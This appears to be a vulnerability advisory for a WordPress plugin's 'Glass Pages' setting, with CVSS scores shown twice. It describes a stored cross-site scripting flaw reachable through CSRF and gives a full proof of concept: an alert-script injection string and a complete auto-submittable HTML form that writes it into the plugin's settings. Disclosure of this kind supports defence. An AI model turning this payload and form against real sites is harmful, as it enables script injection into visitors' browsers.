6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The plugin does not sanitise or escape its “Glass Pages” setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin did not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack.
Add the following payload in the "Glass Pages" setting (/wp-admin/options-general.php?page=glass%2Fglass.php): '><script>alert(/XSS/)</script>
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=glass/glass.php" method="POST">
<input type="hidden" name="myrtheGlassDefaultSize" value="4" />
<input type="hidden" name="myrtheGlassRimPath" value="" />
<input type="hidden" name="myrtheGlassRimRGB" value="CC6633" />
<input type="hidden" name="myrtheGlassBackgroundRGB" value="999999" />
<input type="hidden" name="myrtheGlassMinEnlarge" value="2.0" />
<input type="hidden" name="myrtheGlassMaxEnlarge" value="100.0" />
<input type="hidden" name="myrtheGlassDx" value="0" />
<input type="hidden" name="myrtheGlassDy" value="0" />
<input type="hidden" name="myrtheGlassOnFrontPage" value="y" />
<input type="hidden" name="myrtheGlassCategories" value="" />
<input type="hidden" name="myrtheGlassPages" value="'><script>alert(/XSS/)</script>" />
<input type="hidden" name="myrtheGlassExcludePlatforms" value="iPod" />
<input type="hidden" name="update_MyrtheGlassSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N